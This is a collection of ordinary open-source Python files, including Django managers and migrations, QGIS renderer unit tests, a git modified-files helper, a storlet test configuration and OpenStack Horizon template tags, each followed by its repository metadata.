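# application. The class name and the /healthz path are assumptions made
# for this example, not part of the billboards project.
class HealthCheckMiddleware(object):
    def __init__(self, wrapped_app):
        self.wrapped_app = wrapped_app

    def __call__(self, environ, start_response):
        # Answer a trivial probe without entering Django at all.
        if environ.get('PATH_INFO') == '/healthz':
            start_response('200 OK', [('Content-Type', 'text/plain')])
            return [b'ok']
        # Delegate everything else to the wrapped Django application.
        return self.wrapped_app(environ, start_response)

# application = HealthCheckMiddleware(application)  # uncomment to enable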
|
serefimov/billboards
|
billboards/billboards/wsgi.py
|
Python
|
mit
| 1,568 | 0.001276 |
from django.db import models
from django.db.models import OuterRef, Subquery, Count
from django.db.models.functions import Coalesce
class GalleryManager(models.Manager):
def annotated_gallery(self):
"""Annotate gallery with
- ``linked_content``, which contains the pk of the associated content, if any;
- ``image_count``, which contains the number of images.
:rtype: QuerySet
"""
from zds.tutorialv2.models.database import PublishableContent
from zds.gallery.models import Image
linked_content = PublishableContent.objects.filter(gallery__pk=OuterRef("pk")).values("pk")
images = (
Image.objects.filter(gallery__pk=OuterRef("pk"))
.values("gallery")
.annotate(count=Count("pk"))
.values("count")
)
return self.annotate(linked_content=Subquery(linked_content)).annotate(
image_count=Coalesce(Subquery(images), 0)
)
def galleries_of_user(self, user):
"""Get galleries of user, and annotate with an extra field ``user_mode`` (which contains R or W)
:param user: the user
:type user: zds.member.models.User
:rtype: QuerySet
"""
from zds.gallery.models import UserGallery
user_galleries = UserGallery.objects.filter(user=user).prefetch_related("gallery").values("gallery__pk")
user_mode = UserGallery.objects.filter(user=user, gallery__pk=OuterRef("pk"))
return (
self.annotated_gallery()
.filter(pk__in=user_galleries)
.annotate(user_mode=Subquery(user_mode.values("mode")))
)
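# Hedged usage sketch (assumes this manager is attached to the Gallery model
# as ``objects``, which this file does not show):
#
#     for gallery in Gallery.objects.galleries_of_user(user):
#         print(gallery.pk, gallery.image_count, gallery.user_mode)
#
# ``linked_content`` is None for galleries with no associated content, and
# ``image_count`` falls back to 0 thanks to the Coalesce wrapper.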
|
ChantyTaguan/zds-site
|
zds/gallery/managers.py
|
Python
|
gpl-3.0
| 1,665 | 0.003003 |
# -*- coding: utf-8 -*-
"""
***************************************************************************
test_qgsrulebasedrenderer.py
---------------------
Date : September 2015
Copyright : (C) 2015 by Matthias Kuhn
Email : matthias at opengis dot ch
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
From build dir, run: ctest -R PyQgsRulebasedRenderer -V
"""
__author__ = 'Matthias Kuhn'
__date__ = 'September 2015'
__copyright__ = '(C) 2015, Matthias Kuhn'
import qgis # NOQA
import os
from qgis.PyQt.QtCore import Qt, QSize
from qgis.PyQt.QtGui import QColor
from qgis.core import (QgsVectorLayer,
QgsMapSettings,
QgsProject,
QgsRectangle,
QgsMultiRenderChecker,
QgsRuleBasedRenderer,
QgsFillSymbol,
QgsMarkerSymbol,
QgsRendererCategory,
QgsCategorizedSymbolRenderer,
QgsGraduatedSymbolRenderer,
QgsRendererRange,
QgsRenderContext,
QgsSymbolLayer,
QgsSimpleMarkerSymbolLayer,
QgsProperty,
QgsFeature,
QgsGeometry,
QgsEmbeddedSymbolRenderer
)
from qgis.testing import start_app, unittest
from utilities import unitTestDataPath
# Convenience instances in case you may need them
# not used in this test
start_app()
TEST_DATA_DIR = unitTestDataPath()
class TestQgsRulebasedRenderer(unittest.TestCase):
@classmethod
def setUpClass(cls):
# Super ugly hack to make sure Python does not clean up our map settings
# objects; otherwise this might lead to occasional crashes on Travis
cls.mapsettings_archive = list()
def setUp(self):
myShpFile = os.path.join(TEST_DATA_DIR, 'rectangles.shp')
layer = QgsVectorLayer(myShpFile, 'Rectangles', 'ogr')
QgsProject.instance().addMapLayer(layer)
# Create rulebased style
sym1 = QgsFillSymbol.createSimple({'color': '#fdbf6f', 'outline_color': 'black'})
sym2 = QgsFillSymbol.createSimple({'color': '#71bd6c', 'outline_color': 'black'})
sym3 = QgsFillSymbol.createSimple({'color': '#1f78b4', 'outline_color': 'black'})
self.r1 = QgsRuleBasedRenderer.Rule(sym1, 0, 0, '"id" = 1')
self.r2 = QgsRuleBasedRenderer.Rule(sym2, 0, 0, '"id" = 2')
self.r3 = QgsRuleBasedRenderer.Rule(sym3, 0, 0, 'ELSE')
rootrule = QgsRuleBasedRenderer.Rule(None)
rootrule.appendChild(self.r1)
rootrule.appendChild(self.r2)
rootrule.appendChild(self.r3)
layer.setRenderer(QgsRuleBasedRenderer(rootrule))
self.mapsettings = QgsMapSettings()
self.mapsettings.setOutputSize(QSize(400, 400))
self.mapsettings.setOutputDpi(96)
self.mapsettings.setExtent(QgsRectangle(-163, 22, -70, 52))
rendered_layers = [layer]
self.mapsettings.setLayers(rendered_layers)
self.mapsettings_archive.append(self.mapsettings)
def testElse(self):
# Setup rendering check
renderchecker = QgsMultiRenderChecker()
renderchecker.setMapSettings(self.mapsettings)
renderchecker.setControlName('expected_rulebased_else')
self.assertTrue(renderchecker.runTest('rulebased_else'))
def testDisabledElse(self):
# Disable a rule and assert that it is hidden, not rendered by the ELSE rule
self.r2.setActive(False)
renderchecker = QgsMultiRenderChecker()
renderchecker.setMapSettings(self.mapsettings)
renderchecker.setControlName('expected_rulebased_disabled_else')
self.assertTrue(renderchecker.runTest('rulebased_disabled_else'))
def testWillRenderFeature(self):
vl = self.mapsettings.layers()[0]
ft = vl.getFeature(0) # 'id' = 1
renderer = vl.renderer()
ctx = QgsRenderContext.fromMapSettings(self.mapsettings)
ctx.expressionContext().setFeature(ft)
renderer.rootRule().children()[0].setActive(False)
renderer.rootRule().children()[1].setActive(True)
renderer.rootRule().children()[2].setActive(True)
renderer.startRender(ctx, vl.fields()) # build mActiveChildren
rendered = renderer.willRenderFeature(ft, ctx)
renderer.stopRender(ctx)
renderer.rootRule().children()[0].setActive(True)
self.assertFalse(rendered)
renderer.startRender(ctx, vl.fields()) # build mActiveChildren
rendered = renderer.willRenderFeature(ft, ctx)
renderer.stopRender(ctx)
self.assertTrue(rendered)
def testWillRenderFeatureNestedElse(self):
vl = self.mapsettings.layers()[0]
ft = vl.getFeature(0) # 'id' = 1
ctx = QgsRenderContext.fromMapSettings(self.mapsettings)
ctx.expressionContext().setFeature(ft)
# Create rulebased style
sym1 = QgsFillSymbol.createSimple({'color': '#fdbf6f', 'outline_color': 'black'})
sym2 = QgsFillSymbol.createSimple({'color': '#71bd6c', 'outline_color': 'black'})
sym3 = QgsFillSymbol.createSimple({'color': '#1f78b4', 'outline_color': 'black'})
self.rx1 = QgsRuleBasedRenderer.Rule(sym1, 0, 0, '"id" = 1')
self.rx2 = QgsRuleBasedRenderer.Rule(sym2, 0, 0, '"id" = 2')
self.rx3 = QgsRuleBasedRenderer.Rule(sym3, 0, 0, 'ELSE')
self.rx3.appendChild(self.rx1)
rootrule = QgsRuleBasedRenderer.Rule(None)
rootrule.appendChild(self.rx2)
rootrule.appendChild(self.rx3)
vl.setRenderer(QgsRuleBasedRenderer(rootrule))
renderer = vl.renderer()
# Render with else rule and all activated
renderer.startRender(ctx, vl.fields())
self.assertTrue(renderer.willRenderFeature(ft, ctx))
renderer.stopRender(ctx)
# Render with else rule where else is deactivated
renderer.rootRule().children()[1].setActive(False)
renderer.startRender(ctx, vl.fields())
self.assertFalse(renderer.willRenderFeature(ft, ctx))
renderer.stopRender(ctx)
def testFeatureCount(self):
vl = self.mapsettings.layers()[0]
ft = vl.getFeature(2) # 'id' = 3 => ELSE
renderer = vl.renderer()
ctx = QgsRenderContext.fromMapSettings(self.mapsettings)
ctx.expressionContext().setFeature(ft)
counter = vl.countSymbolFeatures()
counter.waitForFinished()
renderer.startRender(ctx, vl.fields())
elseRule = None
for rule in renderer.rootRule().children():
if rule.filterExpression() == 'ELSE':
elseRule = rule
self.assertIsNotNone(elseRule)
cnt = counter.featureCount(elseRule.ruleKey())
self.assertEqual(cnt, 1)
def testRefineWithCategories(self):
# Test refining rule with categories (refs #10815)
# First, try with a field based category (id)
cats = []
cats.append(QgsRendererCategory(1, QgsMarkerSymbol(), "id 1"))
cats.append(QgsRendererCategory(2, QgsMarkerSymbol(), ''))
cats.append(QgsRendererCategory(None, QgsMarkerSymbol(), ''))
c = QgsCategorizedSymbolRenderer("id", cats)
QgsRuleBasedRenderer.refineRuleCategories(self.r2, c)
self.assertEqual(self.r2.children()[0].filterExpression(), '"id" = 1')
self.assertEqual(self.r2.children()[1].filterExpression(), '"id" = 2')
self.assertEqual(self.r2.children()[0].label(), 'id 1')
self.assertEqual(self.r2.children()[1].label(), '2')
self.assertEqual(self.r2.children()[2].label(), '')
# Next try with an expression based category
cats = []
cats.append(QgsRendererCategory(1, QgsMarkerSymbol(), "result 1"))
cats.append(QgsRendererCategory(2, QgsMarkerSymbol(), "result 2"))
c = QgsCategorizedSymbolRenderer("id + 1", cats)
QgsRuleBasedRenderer.refineRuleCategories(self.r1, c)
self.assertEqual(self.r1.children()[0].filterExpression(), 'id + 1 = 1')
self.assertEqual(self.r1.children()[1].filterExpression(), 'id + 1 = 2')
self.assertEqual(self.r1.children()[0].label(), 'result 1')
self.assertEqual(self.r1.children()[1].label(), 'result 2')
# Last try with an expression which is just a quoted field name
cats = []
cats.append(QgsRendererCategory(1, QgsMarkerSymbol(), "result 1"))
cats.append(QgsRendererCategory(2, QgsMarkerSymbol(), "result 2"))
c = QgsCategorizedSymbolRenderer('"id"', cats)
QgsRuleBasedRenderer.refineRuleCategories(self.r3, c)
self.assertEqual(self.r3.children()[0].filterExpression(), '"id" = 1')
self.assertEqual(self.r3.children()[1].filterExpression(), '"id" = 2')
self.assertEqual(self.r3.children()[0].label(), 'result 1')
self.assertEqual(self.r3.children()[1].label(), 'result 2')
def testRefineWithRanges(self):
# Test refining rule with ranges (refs #10815)
# First, try with a field-based range (id)
ranges = []
ranges.append(QgsRendererRange(0, 1, QgsMarkerSymbol(), "0-1"))
ranges.append(QgsRendererRange(1, 2, QgsMarkerSymbol(), "1-2"))
g = QgsGraduatedSymbolRenderer("id", ranges)
QgsRuleBasedRenderer.refineRuleRanges(self.r2, g)
self.assertEqual(self.r2.children()[0].filterExpression(), '"id" >= 0.0000 AND "id" <= 1.0000')
self.assertEqual(self.r2.children()[1].filterExpression(), '"id" > 1.0000 AND "id" <= 2.0000')
# Next try with an expression based range
ranges = []
ranges.append(QgsRendererRange(0, 1, QgsMarkerSymbol(), "0-1"))
ranges.append(QgsRendererRange(1, 2, QgsMarkerSymbol(), "1-2"))
g = QgsGraduatedSymbolRenderer("id / 2", ranges)
QgsRuleBasedRenderer.refineRuleRanges(self.r1, g)
self.assertEqual(self.r1.children()[0].filterExpression(), '(id / 2) >= 0.0000 AND (id / 2) <= 1.0000')
self.assertEqual(self.r1.children()[1].filterExpression(), '(id / 2) > 1.0000 AND (id / 2) <= 2.0000')
# Last try with an expression which is just a quoted field name
ranges = []
ranges.append(QgsRendererRange(0, 1, QgsMarkerSymbol(), "0-1"))
ranges.append(QgsRendererRange(1, 2, QgsMarkerSymbol(), "1-2"))
g = QgsGraduatedSymbolRenderer('"id"', ranges)
QgsRuleBasedRenderer.refineRuleRanges(self.r3, g)
self.assertEqual(self.r3.children()[0].filterExpression(), '"id" >= 0.0000 AND "id" <= 1.0000')
self.assertEqual(self.r3.children()[1].filterExpression(), '"id" > 1.0000 AND "id" <= 2.0000')
def testConvertFromCategorisedRenderer(self):
# Test converting categorised renderer to rule based
# First, try with a field based category (id)
cats = []
cats.append(QgsRendererCategory(1, QgsMarkerSymbol(), "id 1"))
cats.append(QgsRendererCategory(2, QgsMarkerSymbol(), "id 2"))
cats.append(QgsRendererCategory('a\'b', QgsMarkerSymbol(), "id a'b"))
cats.append(QgsRendererCategory('a\nb', QgsMarkerSymbol(), "id a\\nb"))
cats.append(QgsRendererCategory('a\\b', QgsMarkerSymbol(), "id a\\\\b"))
cats.append(QgsRendererCategory('a\tb', QgsMarkerSymbol(), "id a\\tb"))
cats.append(QgsRendererCategory(['c', 'd'], QgsMarkerSymbol(), "c/d"))
c = QgsCategorizedSymbolRenderer("id", cats)
r = QgsRuleBasedRenderer.convertFromRenderer(c)
self.assertEqual(len(r.rootRule().children()), 7)
self.assertEqual(r.rootRule().children()[0].filterExpression(), '"id" = 1')
self.assertEqual(r.rootRule().children()[1].filterExpression(), '"id" = 2')
self.assertEqual(r.rootRule().children()[2].filterExpression(), '"id" = \'a\'\'b\'')
self.assertEqual(r.rootRule().children()[3].filterExpression(), '"id" = \'a\\nb\'')
self.assertEqual(r.rootRule().children()[4].filterExpression(), '"id" = \'a\\\\b\'')
self.assertEqual(r.rootRule().children()[5].filterExpression(), '"id" = \'a\\tb\'')
self.assertEqual(r.rootRule().children()[6].filterExpression(), '"id" IN (\'c\',\'d\')')
# Next try with an expression based category
cats = []
cats.append(QgsRendererCategory(1, QgsMarkerSymbol(), "result 1"))
cats.append(QgsRendererCategory(2, QgsMarkerSymbol(), "result 2"))
cats.append(QgsRendererCategory([3, 4], QgsMarkerSymbol(), "result 3/4"))
c = QgsCategorizedSymbolRenderer("id + 1", cats)
r = QgsRuleBasedRenderer.convertFromRenderer(c)
self.assertEqual(len(r.rootRule().children()), 3)
self.assertEqual(r.rootRule().children()[0].filterExpression(), 'id + 1 = 1')
self.assertEqual(r.rootRule().children()[1].filterExpression(), 'id + 1 = 2')
self.assertEqual(r.rootRule().children()[2].filterExpression(), 'id + 1 IN (3,4)')
# Last try with an expression which is just a quoted field name
cats = []
cats.append(QgsRendererCategory(1, QgsMarkerSymbol(), "result 1"))
cats.append(QgsRendererCategory(2, QgsMarkerSymbol(), "result 2"))
cats.append(QgsRendererCategory([3, 4], QgsMarkerSymbol(), "result 3/4"))
c = QgsCategorizedSymbolRenderer('"id"', cats)
r = QgsRuleBasedRenderer.convertFromRenderer(c)
self.assertEqual(len(r.rootRule().children()), 3)
self.assertEqual(r.rootRule().children()[0].filterExpression(), '"id" = 1')
self.assertEqual(r.rootRule().children()[1].filterExpression(), '"id" = 2')
self.assertEqual(r.rootRule().children()[2].filterExpression(), '"id" IN (3,4)')
def testConvertFromGraduatedRenderer(self):
# Test converting graduated renderer to rule based
# First, try with a field-based range (id)
ranges = []
ranges.append(QgsRendererRange(0, 1, QgsMarkerSymbol(), "0-1"))
ranges.append(QgsRendererRange(1, 2, QgsMarkerSymbol(), "1-2"))
g = QgsGraduatedSymbolRenderer("id", ranges)
r = QgsRuleBasedRenderer.convertFromRenderer(g)
self.assertEqual(r.rootRule().children()[0].filterExpression(), '"id" >= 0.000000 AND "id" <= 1.000000')
self.assertEqual(r.rootRule().children()[1].filterExpression(), '"id" > 1.000000 AND "id" <= 2.000000')
# Next try with an expression based range
ranges = []
ranges.append(QgsRendererRange(0, 1, QgsMarkerSymbol(), "0-1"))
ranges.append(QgsRendererRange(1, 2, QgsMarkerSymbol(), "1-2"))
g = QgsGraduatedSymbolRenderer("id / 2", ranges)
r = QgsRuleBasedRenderer.convertFromRenderer(g)
self.assertEqual(r.rootRule().children()[0].filterExpression(), '(id / 2) >= 0.000000 AND (id / 2) <= 1.000000')
self.assertEqual(r.rootRule().children()[1].filterExpression(), '(id / 2) > 1.000000 AND (id / 2) <= 2.000000')
# Last try with an expression which is just a quoted field name
ranges = []
ranges.append(QgsRendererRange(0, 1, QgsMarkerSymbol(), "0-1"))
ranges.append(QgsRendererRange(1, 2, QgsMarkerSymbol(), "1-2"))
g = QgsGraduatedSymbolRenderer('"id"', ranges)
r = QgsRuleBasedRenderer.convertFromRenderer(g)
self.assertEqual(r.rootRule().children()[0].filterExpression(), '"id" >= 0.000000 AND "id" <= 1.000000')
self.assertEqual(r.rootRule().children()[1].filterExpression(), '"id" > 1.000000 AND "id" <= 2.000000')
def testWillRenderFeatureTwoElse(self):
"""Regression #21287, also test rulesForFeature since there were no tests any where and I've found a couple of issues"""
vl = self.mapsettings.layers()[0]
ft = vl.getFeature(0) # 'id' = 1
ctx = QgsRenderContext.fromMapSettings(self.mapsettings)
ctx.expressionContext().setFeature(ft)
# Create rulebased style
sym2 = QgsFillSymbol.createSimple({'color': '#71bd6c', 'outline_color': 'black'})
sym3 = QgsFillSymbol.createSimple({'color': '#1f78b4', 'outline_color': 'black'})
sym4 = QgsFillSymbol.createSimple({'color': '#ff00ff', 'outline_color': 'black'})
self.rx2 = QgsRuleBasedRenderer.Rule(sym2, 0, 0, '"id" = 200')
self.rx3 = QgsRuleBasedRenderer.Rule(sym3, 1000, 100000000, 'ELSE') # <<< - match this!
self.rx4 = QgsRuleBasedRenderer.Rule(sym4, 0.1, 999, 'ELSE')
rootrule = QgsRuleBasedRenderer.Rule(None)
rootrule.appendChild(self.rx2)
rootrule.appendChild(self.rx3)
rootrule.appendChild(self.rx4) # <- failed in regression #21287
vl.setRenderer(QgsRuleBasedRenderer(rootrule))
renderer = vl.renderer()
# Render with else rule and all activated
renderer.startRender(ctx, vl.fields())
self.assertTrue(renderer.willRenderFeature(ft, ctx))
# No context? All rules
self.assertEqual(len(rootrule.rulesForFeature(ft)), 2)
self.assertEqual(set(rootrule.rulesForFeature(ft)), {self.rx3, self.rx4})
# With context: only the matching one
self.assertEqual(len(rootrule.rulesForFeature(ft, ctx)), 1)
self.assertEqual(rootrule.rulesForFeature(ft, ctx)[0], self.rx3)
renderer.stopRender(ctx)
def testUsedAttributes(self):
ctx = QgsRenderContext.fromMapSettings(self.mapsettings)
# Create rulebased style
sym2 = QgsFillSymbol.createSimple({'color': '#71bd6c', 'outline_color': 'black'})
sym3 = QgsFillSymbol.createSimple({'color': '#1f78b4', 'outline_color': 'black'})
self.rx2 = QgsRuleBasedRenderer.Rule(sym2, 0, 0, '"id" = 200')
self.rx3 = QgsRuleBasedRenderer.Rule(sym3, 1000, 100000000, 'ELSE')
rootrule = QgsRuleBasedRenderer.Rule(None)
rootrule.appendChild(self.rx2)
rootrule.appendChild(self.rx3)
renderer = QgsRuleBasedRenderer(rootrule)
self.assertCountEqual(renderer.usedAttributes(ctx), {'id'})
def testPointsUsedAttributes(self):
points_shp = os.path.join(TEST_DATA_DIR, 'points.shp')
points_layer = QgsVectorLayer(points_shp, 'Points', 'ogr')
QgsProject.instance().addMapLayer(points_layer)
# Create rulebased style
sym1 = QgsMarkerSymbol()
l1 = QgsSimpleMarkerSymbolLayer(QgsSimpleMarkerSymbolLayer.Triangle, 5)
l1.setColor(QColor(255, 0, 0))
l1.setStrokeStyle(Qt.NoPen)
l1.setDataDefinedProperty(QgsSymbolLayer.PropertyAngle, QgsProperty.fromField("Heading"))
sym1.changeSymbolLayer(0, l1)
sym2 = QgsMarkerSymbol()
l2 = QgsSimpleMarkerSymbolLayer(QgsSimpleMarkerSymbolLayer.Triangle, 5)
l2.setColor(QColor(0, 255, 0))
l2.setStrokeStyle(Qt.NoPen)
l2.setDataDefinedProperty(QgsSymbolLayer.PropertyAngle, QgsProperty.fromField("Heading"))
sym2.changeSymbolLayer(0, l2)
sym3 = QgsMarkerSymbol()
l3 = QgsSimpleMarkerSymbolLayer(QgsSimpleMarkerSymbolLayer.Triangle, 5)
l3.setColor(QColor(0, 0, 255))
l3.setStrokeStyle(Qt.NoPen)
l3.setDataDefinedProperty(QgsSymbolLayer.PropertyAngle, QgsProperty.fromField("Heading"))
sym3.changeSymbolLayer(0, l3)
r1 = QgsRuleBasedRenderer.Rule(sym1, 0, 0, '"Class" = \'B52\'')
r2 = QgsRuleBasedRenderer.Rule(sym2, 0, 0, '"Class" = \'Biplane\'')
r3 = QgsRuleBasedRenderer.Rule(sym3, 0, 0, '"Class" = \'Jet\'')
rootrule = QgsRuleBasedRenderer.Rule(None)
rootrule.appendChild(r1)
rootrule.appendChild(r2)
rootrule.appendChild(r3)
renderer = QgsRuleBasedRenderer(rootrule)
points_layer.setRenderer(renderer)
ms = QgsMapSettings()
ms.setOutputSize(QSize(400, 400))
ms.setOutputDpi(96)
ms.setExtent(QgsRectangle(-133, 22, -70, 52))
ms.setLayers([points_layer])
ctx = QgsRenderContext.fromMapSettings(ms)
ctx.expressionContext().appendScope(points_layer.createExpressionContextScope())
# for symbol layer
self.assertCountEqual(l1.usedAttributes(ctx), {'Heading'})
# for symbol
self.assertCountEqual(sym1.usedAttributes(ctx), {'Heading'})
# for symbol renderer
self.assertCountEqual(renderer.usedAttributes(ctx), {'Class', 'Heading'})
QgsProject.instance().removeMapLayer(points_layer)
def testConvertFromEmbedded(self):
"""
Test converting an embedded symbol renderer to a rule based renderer
"""
points_layer = QgsVectorLayer('Point', 'Polys', 'memory')
f = QgsFeature()
f.setGeometry(QgsGeometry.fromWkt('Point(-100 30)'))
f.setEmbeddedSymbol(
QgsMarkerSymbol.createSimple({'name': 'triangle', 'size': 10, 'color': '#ff0000', 'outline_style': 'no'}))
self.assertTrue(points_layer.dataProvider().addFeature(f))
f.setGeometry(QgsGeometry.fromWkt('Point(-110 40)'))
f.setEmbeddedSymbol(
QgsMarkerSymbol.createSimple({'name': 'square', 'size': 7, 'color': '#00ff00', 'outline_style': 'no'}))
self.assertTrue(points_layer.dataProvider().addFeature(f))
f.setGeometry(QgsGeometry.fromWkt('Point(-90 50)'))
f.setEmbeddedSymbol(None)
self.assertTrue(points_layer.dataProvider().addFeature(f))
renderer = QgsEmbeddedSymbolRenderer(defaultSymbol=QgsMarkerSymbol.createSimple({'name': 'star', 'size': 10, 'color': '#ff00ff', 'outline_style': 'no'}))
points_layer.setRenderer(renderer)
rule_based = QgsRuleBasedRenderer.convertFromRenderer(renderer, points_layer)
self.assertEqual(len(rule_based.rootRule().children()), 3)
rule_0 = rule_based.rootRule().children()[0]
self.assertEqual(rule_0.filterExpression(), '$id=1')
self.assertEqual(rule_0.label(), '1')
self.assertEqual(rule_0.symbol().color().name(), '#ff0000')
rule_1 = rule_based.rootRule().children()[1]
self.assertEqual(rule_1.filterExpression(), '$id=2')
self.assertEqual(rule_1.label(), '2')
self.assertEqual(rule_1.symbol().color().name(), '#00ff00')
rule_2 = rule_based.rootRule().children()[2]
self.assertEqual(rule_2.filterExpression(), 'ELSE')
self.assertEqual(rule_2.label(), 'All other features')
self.assertEqual(rule_2.symbol().color().name(), '#ff00ff')
if __name__ == '__main__':
unittest.main()
|
rduivenvoorde/QGIS
|
tests/src/python/test_qgsrulebasedrenderer.py
|
Python
|
gpl-2.0
| 23,130 | 0.002335 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('users', '0019_auto_20140909_1253'),
]
operations = [
migrations.AlterModelOptions(
name='donationitemcategory',
options={'verbose_name_plural': 'Donation item categories'},
),
migrations.AddField(
model_name='volunteeractivitytype',
name='color',
field=models.CharField(default='red', max_length=64, choices=[(b'red', b'Red'), (b'green', b'Green'), (b'purple', b'Purple')]),
preserve_default=False,
),
migrations.AlterField(
model_name='donationitem',
name='requirement',
field=models.ForeignKey(related_name=b'items', to='users.DonationRequirement'),
),
]
|
klpdotorg/dubdubdub
|
apps/users/migrations/0020_auto_20140925_1129.py
|
Python
|
mit
| 905 | 0.00221 |
# coding=utf-8
# Copyright 2020 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# this script reports modified .py files under the desired list of top-level sub-dirs passed as a list of arguments, e.g.:
# python ./utils/get_modified_files.py utils src tests examples
#
# it uses git to find the forking point and which files were modified - i.e. files not under git won't be considered
# since the output of this script is fed into Makefile commands it doesn't print a newline after the results
import re
import subprocess
import sys
fork_point_sha = subprocess.check_output("git merge-base master HEAD".split()).decode("utf-8")
modified_files = subprocess.check_output(f"git diff --name-only {fork_point_sha}".split()).decode("utf-8").split()
joined_dirs = "|".join(sys.argv[1:])
regex = re.compile(fr"^({joined_dirs}).*?\.py$")
relevant_modified_files = [x for x in modified_files if regex.match(x)]
print(" ".join(relevant_modified_files), end="")
|
huggingface/pytorch-transformers
|
utils/get_modified_files.py
|
Python
|
apache-2.0
| 1,484 | 0.003369 |
# ------------------------------------------------------------------------------
#
class Attributes (object) :
# FIXME: add method sigs
# --------------------------------------------------------------------------
#
def __init__ (self, vals={}) :
raise Exception ("%s is not implemented" % self.__class__.__name__)
# ------------------------------------------------------------------------------
#
|
JensTimmerman/radical.pilot
|
docs/architecture/api_draft/attributes.py
|
Python
|
mit
| 430 | 0.011628 |
'''-------------------------------------------------------------------------
Copyright IBM Corp. 2015, 2015 All Rights Reserved
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-------------------------------------------------------------------------'''
'''
IMPORTANT: Make sure the variables AUTH_IP and DEV_AUTH_IP point to the system
you are testing!
'''
'''------------------------------------------------------------------------'''
# Establishing Swift connection, user ID, etc
PROXY_PROTOCOL = 'HTTP'
AUTH_PROTOCOL = 'HTTP'
DEV_AUTH_IP = '9.26.19.179'
AUTH_IP = DEV_AUTH_IP
PROXY_PORT = '80'
AUTH_PORT = '5000'
ACCOUNT = 'service'
USER_NAME = 'swift'
PASSWORD = 'passw0rd'
|
hroumani/genericStorletStore
|
storletDeploy/sys_test_params.py
|
Python
|
apache-2.0
| 1,153 | 0 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('labman_setup', '0003_googlesearchscript'),
]
operations = [
migrations.AddField(
model_name='labmandeploygeneralsettings',
name='background_color',
field=models.CharField(max_length=25, null=True, blank=True),
preserve_default=True,
),
]
|
morelab/labman_ud
|
labman_ud/labman_setup/migrations/0004_labmandeploygeneralsettings_background_color.py
|
Python
|
gpl-3.0
| 494 | 0 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
from django import template
from django.utils.datastructures import SortedDict # noqa
from django.utils.encoding import force_unicode # noqa
from django.utils.translation import ugettext_lazy as _ # noqa
from horizon.base import Horizon # noqa
from horizon import conf
register = template.Library()
@register.filter
def has_permissions(user, component):
"""
Checks if the given user meets the permissions requirements for
the component.
"""
return user.has_perms(getattr(component, 'permissions', set()))
@register.filter
def has_permissions_on_list(components, user):
return [component for component
in components if has_permissions(user, component)]
@register.inclusion_tag('horizon/_nav_list.html', takes_context=True)
def horizon_main_nav(context):
""" Generates top-level dashboard navigation entries. """
if 'request' not in context:
return {}
current_dashboard = context['request'].horizon.get('dashboard', None)
dashboards = []
for dash in Horizon.get_dashboards():
if callable(dash.nav) and dash.nav(context):
dashboards.append(dash)
elif dash.nav:
dashboards.append(dash)
return {'components': dashboards,
'user': context['request'].user,
'current': current_dashboard,
'request': context['request'],
'showOnlyComponent' : _("Federation")}
@register.inclusion_tag('horizon/_subnav_list.html', takes_context=True)
def horizon_dashboard_nav(context):
""" Generates sub-navigation entries for the current dashboard. """
if 'request' not in context:
return {}
dashboard = context['request'].horizon['dashboard']
panel_groups = dashboard.get_panel_groups()
non_empty_groups = []
for group in panel_groups.values():
allowed_panels = []
for panel in group:
if callable(panel.nav) and panel.nav(context):
allowed_panels.append(panel)
elif not callable(panel.nav) and panel.nav:
allowed_panels.append(panel)
if allowed_panels:
non_empty_groups.append((group.name, allowed_panels))
return {'components': SortedDict(non_empty_groups),
'user': context['request'].user,
'current': context['request'].horizon['panel'].slug,
'request': context['request']}
@register.filter
def quota(val, units=None):
if val == float("inf"):
return _("No Limit")
elif units is not None:
return "%s %s %s" % (val, units, force_unicode(_("Available")))
else:
return "%s %s" % (val, force_unicode(_("Available")))
class JSTemplateNode(template.Node):
""" Helper node for the ``jstemplate`` template tag. """
def __init__(self, nodelist):
self.nodelist = nodelist
def render(self, context, ):
output = self.nodelist.render(context)
output = output.replace('[[[', '{{{').replace(']]]', '}}}')
output = output.replace('[[', '{{').replace(']]', '}}')
output = output.replace('[%', '{%').replace('%]', '%}')
return output
@register.tag
def jstemplate(parser, token):
"""
Replaces ``[[[`` and ``]]]`` with ``{{{`` and ``}}}``,
``[[`` and ``]]`` with ``{{`` and ``}}`` and
``[%`` and ``%]`` with ``{%`` and ``%}`` to avoid conflicts
with Django's template engine when using any of the Mustache-based
templating libraries.
"""
nodelist = parser.parse(('endjstemplate',))
parser.delete_first_token()
return JSTemplateNode(nodelist)
@register.assignment_tag
def load_config():
return conf.HORIZON_CONFIG
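# Standalone sketch of the substitution jstemplate performs, applied with
# plain string methods outside the template engine (the sample text is
# invented for illustration):
_jstemplate_sample = '[[[ raw ]]] [[ var ]] [% if ok %]yes[% endif %]'
_jstemplate_rendered = (_jstemplate_sample
                        .replace('[[[', '{{{').replace(']]]', '}}}')
                        .replace('[[', '{{').replace(']]', '}}')
                        .replace('[%', '{%').replace('%]', '%}'))
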